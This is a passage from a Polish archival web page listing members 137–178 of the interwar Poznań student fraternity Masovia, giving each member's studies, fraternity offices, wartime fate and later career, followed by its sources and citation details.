komendant szpitala wojskowego na Starówce, po 1945 organizator służby zdrowia na Pomorzu, naczelny lekarz ubezpieczeń w Inowrocławiu, lekarz i dyrektor 1960-62 Sanatorium Kolejowego Uzdrowiska Inowrocław, działacz społeczny PCK oraz Robotniczego Towarzystwa Przyjaciół Dzieci, pochowany na Cmentarzu przy ul. Karola Libelta w Inowrocławiu, odznaczony m.in. Złotym Krzyżem Zasługi, Orderem Sztandaru Pracy II klasy, Odznaką za wzorową pracą w służbie zdrowia oraz Odznaką za szczególne zasługi dla rozwoju Województwa Bydgoskiego

 137. Marian Smoczyński,

  Stanisław Smoleński, lata 30-te.

 138. Stanisław Smoleński, (13 kwietnia 1908 w Chicago - 12 maja 1996 w Chicago) absolwent Gimnazjum w Wąbrzeźnie 1928, student med. UP 1928-31, student i absolwent 1938 farmacji UP, c. 1930, sekretarz sem. let. 1929/30 i sem. zim. 1930/31, wiceprezes wewn. sem. zim. 1931/32, prezes sem. let. 1934/35 i sem. zim. 1935/36, olderman sem. let. 1936/37, prezes PKM 1936/37, członek Komitetu Organizacyjnego Ślubowań Młodzieży Akademickiej 1936, dwukrotny prezes Koła Farmaceutów UP, członek Młodzieży Wszechpolskiej i Sodalicji Mariańskiej, członek SN, ppor. rez., w czasie okupacji zaangażowany w konspiracyjną działalność Narodowo-Ludowej Organizacji Walki, NSZ, AK, w randze kpt. walczył w Powstaniu Warszawskim, ranny w ataku na “Pastę”, jeniec w oflagach Gross Lubarts, AltenGrabov, Sandbostel i Lubece, po wojnie reaktywator i pierwszy prezes Związku Polaków w Niemczech, w 1949 wyemigrował do Stanów Zjednoczonych, prof. farmakognozji na Uniwersytecie Illinois w Chicago, autor kilkudziesięciu prac naukowych, aktywny działacz polonijny, długoletni prezes Instytutu im. Romana Dmowskiego, przewodniczący Fundacji Towarzystwa Przyjaciół Jana Pawła II, członek Zarządu Głównego Żołnierz AK na stan Illinois, Związku Ziem Zachodnich, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, odznaczony m.in. Krzyżem Kawalerskim Zasługi RP

  Marian Smoniewski, 1932 r.

 139. Marian Ludomir Smoniewski, (1911 - 17 sierpnia 1994) student i absolwent prawa UP, c. 1929, sekretarz sem. let. 1930/31, prezes sem. zim. 1932/33, do 1939 asesor Sądu Apelacyjnego w Poznaniu, ppor. rez., w wojnie obronnej 1939 w Batalionie Obrony Narodowej Poznań 1, m.in. uczestnik bitwy nad Bzurą, w niewoli niemieckiej w oflagach Eichstatt i Murnau, w 1947 wyemigrował do Stanów Zjednoczonych, aktywny działacz polonijny, członek SN, Instytutu Romana Dmowskiego, Związku Narodowego Polskiego, Towarzystwa Przyjaciół Fundacji im. Jana Pawła II, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, członek ostatniego Zarządu Koła, pochowany w grobie rodzinnym na Cmentarzu w Maryhill

 140. Stanisław Smoniewski,
 141. Feliks Soiński, c. ok. 1927, skreślony 1927
 142. Wiesław Speichert, (1912 - 1939 w Warszawie) mgr prawa, sędzia Sądu Okręgowego w Gdyni, zamordowany przez Gestapo

  Aleksander Stawicki, 1932 r.

 143. Aleksander Stawicki,

  Feliks Stefaniak, lata 30-te.

 144. Feliks Stefaniak, z Bydgoszczy

 145. Feliks Stefanowicz,
 146. Kazimierz Stelter, (1904? - 1944) założyciel Masovii, prezes sem. let. 1925/26, wiceprezes zewn. sem. zim. 1926/27, prezes sem. let. 1927/28
 147. Jan Zbigniew Stolzman, student ekonomii UP (?), c. ok. 1931

  Karol Strachanowski, prawd. 1934 r.

 148. Karol Strachanowski, (7 listopada 1914 w maj. Schonweldchen k. Dąbrówna w Prusach Wschodnich - 15 października 1939 w Skarszewach) herbu Szreniawa, s. Bolesława (inż. elektryka, właściciela maj Czerniki pow. kościerski) i Heleny z d. Boening, po niepowodzeniu plebiscytu na Mazurach rodzice opuścili maj. Schonweldchen i kupili maj. Czerniki, absolwent Gimnazjum Państwowego w Kościerzynie 1933, student Wydziału Rolno-Leśnego UP 1934-38, skarbnik sem. zim. 1937/38, inż. rolnik, w wojnie obronnej uczestniczył w walkach obronnych w okolicach Osia i Świecia nad Wisłą, po klęsce wojsk polskich wrócił piechotą do domu rodzinnego, 29 września 1939 z rozkazu starosty kościerskiego Günthera Modrowa wraz z ojcem Bolesławem aresztowany w domu w Czernikach i osadzony w więzieniu w Starej Kiszewie, a następnie w Skarszewach, po okołu dwóch tygodniach wywołany wraz z ojcem z celi, do której już nie wrócili, po wojnie ekshumowane ciało zostało rozpoznane przez siostrę, uznany wyrokiem sądu za zmarłego 15 października 1939, pochowany w mogile masowej w Skarszewach [Źródła (poza wskazanymi poniżej spisu członków): relacja Iwony Przewoskiej]

  Alfons Stube, 1939 r.

 149. Alfons Stube, (1 marca 1903 w miejsc. Siedluchna w pow. mogileńskim - 1940 w Katyniu) s. Maksymiliana i Marianny z Kasprzyckich, student i absolwent 1929 leśnictwa UP, założyciel Masovii, wiceprezes sem. let. 1924/25, olderman sem. let. 1925/26, prezes sem. zim. 1927/28, kierownik przedsiębiorstwa “Paged” w Poznaniu, ppor. rez., w wojnie obronnej 1939 w Oddziale Zapasowym 14 Dywizji Piechoty, w niewoli sowieckiej w Kozielsku, zamordowany przez NKWD

  Henryk Szabliński, pierwsza poł. lat 30-tych.

 150. Henryk Szabliński, (4 lipca 1907 w Dobrzymiu nad Wisłą - lata 80-te) student i absolwent prawa UP 1928-32, prezes sem. zim. 1930/31, wiceprezes zewn. sem. zim. 1931/32, mgr praw, po wojnie sędzia w Nowej Soli, sędzia Sądu Wojewódzkiego w Zielonej Górze

  Ludwik Szudziński, 1927 r.

 151. Ludwik Szudziński, (19 września 1901 w Nowemmieście w woj. pomorskim - 29 stycznia 1985 (1979 ?) w Gdyni) student i absolwent prawa UP 1921-24, założyciel Masovii, olderman sem. let. 1926/27, mgr prawa

 152. Paweł Szulc (Schulz), ( - 1974) założyciel Masovii
 153. Edward Świętkowiak, c. ok. 1927, skreślony 1927
 154. Jan Tijałowski, ( - po 1989) wiceprezes wewn. sem. zim. 1933/34, wystąpił 1934
 155. Paweł Tijałowski, skreślony 1936
 156. Władysław Tomaszek,
 157. Edward Tomaszewski, (29 lipca 1907 w Kościanie -1964) student i absolwent 1932 med. UP, wiceprezes sem. let. 1927/28, prezes sem. let. 1929/30, w 1956 kierownik Wydziału Zdrowia we Wrześni

  Hipolit Tomaszewski, ok. 1930 r.

 158. Hipolit Tomaszewski, członek Masovii, skreślony 1934, później w Husarii, sekretarz sem. let. 1935/36

 159. Władysław Tomczak, (?)

  Edward Tomczyk, 1939 r.

 160. Edward Tomczyk, (18 maja 1915 w Paterson w stanie Nowy Jork w Stanach Zjednoczonych - 27 czerwca 1989 w Lidzbarku Welskim) s. Władysława i Antoniny z d. Bartman, absolwent Gimnazjum w Brodnicy 1934, student i absolwent med. UP 1936-39 i 1945, sekretarz sem. zim. 1938/39, skarbnik sem. let. 1938/39 (ostatnie Prezydium przed wojną), ppor. rez., w wojnie obronnej 1939 w 67 Pułku Piechoty, w niemieckiej niewoli w oflagu IIC Woldenberg, chirurg, po wojnie od 1947 ordynator oddziału chirurgicznego i od 1957 dyrektor Szpitala Miejskiego w Świdnicy, od 1960 ordynator oddziału chirurgicznego Szpitala Rejonowego w Lidzbarku Welskim, radny w Świdnicy, Działdowie i Lidzbarku Warmińskim, odznaczony m.in. Krzyżem Kawalerskim i Oficerskim OOP, Złotym Krzyżem Zasługi, Medalem “Za Udział w Wojnie Obronnej 1939″

 161. Jerzy Tryburczyk, c. ok. 1938
 162. Wiktor Walczak, c. ok. 1927, skreślony 1927
 163. Jan Wardyn, skarbnik sem. zim. 1935/36, sekretarz sem. let. 1936/37

  Józef Waszak, lata 30-te.

 164. Józef Waszak, ( - 1972 w Łodzi) z Kalisza, mgr praw, prywatny przedsiębiorca w Kaliszu

  Edgar Wellenger, 1932 r.

 165. Edgar Wellenger, (25 stycznia 1910 w Działdowie - 12 października 1979) s. Alfreda (Masovia), absolwent Gimnazjum w Wąbrzeźnie 1930, student Wydziału Prawno-Ekonomicznego UP 1930-32, następnie w Szkole Podchorążych w Bydgoszczy, por. służby czynnej, uczestnik wojny obronnej 1939, w niewoli niemieckiej w stalagu w Starogardzie oraz oflagów Arnswalde, Gross-Born i Sandbostel, w Gross-Born adiutant st. obozu płka R. Kaleńskiego - wchodził w skład ścisłego sztabu konspiracyjnego, po wojnie ekonomista w przedsiębiorstwach handlowych w Legnicy, Jeleniej Górze, Wałbrzychu i Mosinie 1946-49, następnie pracował w Przedsiębiorstwie Budownictwa Przemysłowego “Dźwigar” w Warszawie 1949-75, pochowany na Cmentarzu Północnym w Warszawie

 166. Kazimierz Wicherkiewicz, (1913 - 1974 w Trzebnicy (?) c. 1938 Masovia, przeszedł do Piłsudii Posnaniensis, pochowany w Krotoszynie

  Antoni Wierzchosławski, 1936/37 r.

 167. Antoni Wierzchosławski, (13 czerwca 1915 w Marcinkowie Górnym pow. Żnin - 29 października 2008 w Krakowie) s. Józefa i Józefy z d. Brauza, absolwent Gimnazjum Klasycznego w Bydgoszczy 1933, działacz gimnazjalnych organizacji społecznych, m.in. sekretarz Sodalicji Mariańskiej, prezes Kółka Abstynentów, Towarzystwa im. Tomasza Zana, student prawa i ekonomii UP 1933-38, absolwent prawa UP 1938, c. 1934, sekretarz sem. let. 1935/36, prezes sem. zim. 1936/37, wiceprezes zewn. sem. let. 1937/38, działacz Młodzieży Wszechpolskiej, Sodalicji Mariańskiej, Koła Prawników i Ekonomistów, członek Komisji Rewizyjnej Bratniej Pomocy, aplikant sądowy 1938, oficer rez., w wojnie obronnej 1939 dowódca sekcji granatników w 59 Pułku Piechoty, ranny w Puszczy Kampinoskiej i wzięty do niewoli w Modlinie, wysiedlony i wywieziony na roboty przymusowe do Oldenburga w Niemczech 1940-41, z powodu choroby zwolniony wrócił do Generalnej Guberni, pracował jako referent w Związku Gospodarki Zbożem i Paszą w Krośnie i w Krakowie, w działalności konspiracyjnej w NOW ps. “Antoni Galicki”, szef szkolenia wojskowego i instruktor w szkole podchorążych NOW-AK, awansowany na stopień podporucznika, po wojnie z przyczyn politycznych nie mógł ukończyć aplikacji sądowej, pracował jako ekonomista w Urzędzie Wojewódzkim w Krakowie i Nowym Sączu oraz w “Społem” 1945-80, członek Zarządu 1994-97 oraz wiceprezes 1997-2007 Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich, współautor “Księgi Pamiątkowej Korporacji Studentów Uniwersytetu Poznańskiego Masovia” (Poznań 1996), Filister honorowy Magna-Polonii 2004, reaktywator Masovii 2006, działacz organizacji kombatanckich

  Zygmunt Winowski, 1939 r.

 168. Zygmunt Winowski

  Zygmunt (?) Witkowski, 1938 r.

 169. Zygmunt Witkowski, (3 września 1910 w Sosnowcu - ) student med. UP, sekretarz sem. zim. 1932/33, prezes sem. let. 1933/34 (Prezydium X-lecia), wiceprezes zewn. sem. zim. 1937/38, skreślony 1938, absolwent med. UP 1946, po wojnie lekarz na Śląsku

 170. Wacław Wojczyński, mgr praw, dyrektor lombardu w Poznaniu, podczas okupacji w Baligrodzie

  Jan Wolski, pierwsza poł. lat 30-tych.

 171. Jan Wolski, (27 listopada 1906 w Krajkowie - 20 czerwca 1972 w Chodzieży) s. Ludwika i Praksedy z d. Przybylska, absolwent Gimnazjum św. Barbary w Chodzieży 1927, od 1928 student Wydziału Humanistycznego, a następnie od 1933 Wydziału Prawno-Ekonomicznego UP, olderman sem. zim. 1932/33, prezes sem. let. 1933/34, po wojnie dyrektor Zakładów Roszarniczych w Pile

 172. Stefan Wygodzki, wystąpił 1934

  Jan Wyskok, 1938 r.

 173. Jan Wyskok, (5 października 1913 w Duisburgu w Niemczech - 31 lipca 1993 we Wrocławiu) s. Józefa i Katarzyny z d. Skrzypek, absolwent Gimnazjum w Wągrowcu 1935, ukończył szkołę podchorążych przy 19 Pułku Piechoty we Lwowie 1936, student Studium Wychowania Fizycznego przy UP 1936-39, c. 1936, sekretarz 1938/39, uczestnik wojny obronnej 1939, po powrocie z działań wojennych do Krotoszyna wywieziony do obozu pracy przymusowej w Szczecinie i zatrudniony w stoczni Oderwerke, po ucieczce wiosną 1943 w maju 1943 aresztowany przez Gestapo i osadzony w obozie koncentracyjnym w Sachsenhausen k. Oranienburga 1943-45 (nr obozowy 89179), po osbwobodzeniu wrócił do kraju, po wojnie w Grupie Operacyjnej Ministerstwa Przemysłu jako pełnomocnik Komitetu Ekonomicznego Rady Ministrów na miasto Wrocław 1945, kierownik działu Oddziału Wojewódzkiego PZU 1945-51, na stanowiskach kierowniczych w Zakładach Metalowych Wrocław-Zakrzów i Jelczańskich Zakładach Samochodowych Jelcz 1952-58, kierownik działu eksportu i obsługi technicznej przy Fabryce Wagonów “Pafawag” we Wrocławiu 1958-77, działacz w dziedzinie sportu i turystyki we Wrocławiu, m.in. Dolnośląskiego Okręgowego Związku Piłki Nożnej, członek ZBOWiD, posiadał zaszczytny tytuł Pioniera Wrocławia, pochowany na Cmentarzu Parafialnym św. Rodziny na Sempolnie we Wrocławiu

  Edmund Zieliński, 1932 r.

 174. Edmund Zieliński, (13 maja 1907 - 13 lutego 1952) s. Tadeusza i Cecyli z d. Lorych, brat Tadeusza i Telesfora (obaj Masovia), uczestnik wojny obronnej 1939, w niewoli niemieckiej w oflagu VII B Murnau od 17 września 1939 do maja 1945 (zajmował się tam m.in. biblioteką), do Polski wrócił w 1946

 175. Jan Zieliński,

  Tadeusz Zieliński, 1932 r.

 176. Tadeusz Zieliński, (18 marca 1905 w miejsc. Świniec w pow. kościańskim - 25 czerwca 1937 w Poznaniu) s. Tadeusza i Cecyli z d. Lorych, brat Edmunda i Telesfora (obaj Masovia), absolwent Państwowego Gimnazjum Klasycznego w Gnieźnie 1925, student Wydziału Matematyczno-Przyrodniczego UP, wiceprezes zewn. sem. zim. 1927/28, nauczyciel w Gimnazjum i Liceum im. Bolesława Chrobrego w Gnieźnie 1928-31 i Miejskiego Gimnazjum Żeńskiego w Wągrowcu 1932-33, Miejskiej Szkoły Powszechnej w Gnieźnie 1932-36 oraz Miejskiego Gimnazjum Kupieckiego w Gnieźnie, członek Towarzystwa Nauczycieli Szkół Średnich i Wyższych, Ligi Obrony Przeciwpowietrznej i Przeciwgazowej, Polskiego Białego Krzyża, Katolickiego Stowarzyszenia Mężów, pochowany na cmentarzu parafii Św. Wawrzyńca przy ul. Witkowskiej w Gnieźnie

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Jacka Zielińskiego]

  Telesfor Zieliński, 1932 r.

 177. Telesfor Zieliński, s. Tadeusza i Cecyli z d. Lorych, brat Edmunda i Tadeusza (obaj Masovia), uczestnik konspiracji antyniemieckiej w Wielkopolsce, powieszony w Rawiczu

 178. Edgar Zimny, (1912-1994) prawnik, sędzia, adwokat

Pieczęć Masovii, 1931 r.

Listę członków opracowano na podstawie:

1) Łukasz Jesse, Antoni Wierzchosławski, Księga Pamiątkowa Korporacji Studentów Uniwersytetu Poznańskiego “Masovia” wydana z okazji 70-tej rocznicy jej założenia (1924-1994), Poznań 1996,
2) materiałów archiwalnych z Archiwum UAM,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Masovia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 VII 2008 r.
Ostatnia zmiana: 28 III 2015 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Studentów Uniwersytetu Poznańskiego “Masovia”, (na:) www.archiwumkorporacyjne.pl, stan 28 III 2015 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }